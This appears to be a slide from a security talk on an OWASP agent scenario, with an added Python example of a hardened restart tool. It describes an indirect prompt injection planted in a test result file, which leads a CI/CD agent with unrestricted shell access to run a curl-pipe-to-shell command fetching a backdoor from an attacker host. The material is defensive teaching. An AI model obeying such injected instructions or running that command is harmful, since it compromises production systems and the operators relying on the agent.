Slide 16 · Scenario 3
The shell plugin that can execute anything.
OWASP’s third scenario — arbitrary execution instead of one restricted operation.
OWASP SCENARIO #3
Shell Command Plugin with Unrestricted Execution
A developer builds a CI/CD assistant that restarts a specific service when the agent detects a test failure. They integrate a shell-command plugin for the restart operation. Instead of registering only systemctl restart app-test, the plugin allows arbitrary shell execution. An indirect prompt injection — embedded in a test result file the agent reads — instructs it to run curl https://attacker.com/backdoor.sh | sh. The production server is compromised from inside the CI/CD pipeline.
Why it matters: The operation the agent legitimately needed (restart one service) required only one restricted command. The developer’s choice to allow arbitrary shell access turned a maintenance tool into a full RCE vector. CVE-2025-53773 is this exact scenario in production.
The Fix
If the agent needs to restart a service, give it exactly that command — allowlisted, with no shell interpolation. Use function-calling with explicit parameter validation. Treat “run any shell command” as an anti-pattern in agent design.
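The fix above in code, as an added example that is not part of the original slide deck: the anti-pattern (hand the model's string to /bin/sh -c) next to a function-calling tool that exposes exactly one verb with one validated, allowlisted parameter and builds an argv list so nothing is interpolated by a shell. The allowlist contents, the tool name restart_service and the tool-call dict shape are assumptions for this example.

```python
import re
import subprocess

# Constructed allowlist for this example: the one service the CI/CD
# assistant is permitted to restart (the slide's "app-test" service).
ALLOWED_SERVICES = {"app-test"}
# systemd unit names: conservative character set, bounded length.
SERVICE_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9@._-]{0,63}$")


def vulnerable_run_shell(command: str) -> list[str]:
    """Anti-pattern: the plugin passes whatever the model said to a shell.
    Returned as the argv the shell would see, never executed here."""
    return ["/bin/sh", "-c", command]  # pipes, ';' and '|' are all honoured


def build_restart_argv(service: str) -> list[str]:
    """Hardened tool: fixed verb, one validated parameter, no shell."""
    if not SERVICE_NAME_RE.match(service):
        # An injected "app-test; ..." fails here before any allowlist check.
        raise ValueError(f"invalid service name: {service!r}")
    if service not in ALLOWED_SERVICES:
        raise PermissionError(f"service not allowlisted: {service!r}")
    return ["systemctl", "restart", service]


def dispatch(tool_call: dict) -> list[str]:
    """Function-calling boundary: only registered tools, typed arguments.
    tool_call is assumed to look like {"name": ..., "arguments": {...}}."""
    tools = {"restart_service": build_restart_argv}
    fn = tools.get(tool_call.get("name"))
    if fn is None:
        # There is no "run_shell" tool to call, so there is nothing to inject into.
        raise PermissionError(f"unknown tool: {tool_call.get('name')!r}")
    args = tool_call.get("arguments", {})
    if set(args) != {"service"} or not isinstance(args["service"], str):
        raise ValueError("restart_service takes exactly one string argument: service")
    return fn(args["service"])


def execute(argv: list[str]) -> int:
    """Run the validated argv with shell=False: argument bytes are passed
    to the program verbatim and are never parsed as shell syntax."""
    return subprocess.run(argv, shell=False, check=False).returncode
```

Only the argv builders run in this example; execute() is where a real plugin would call systemctl on the validated list.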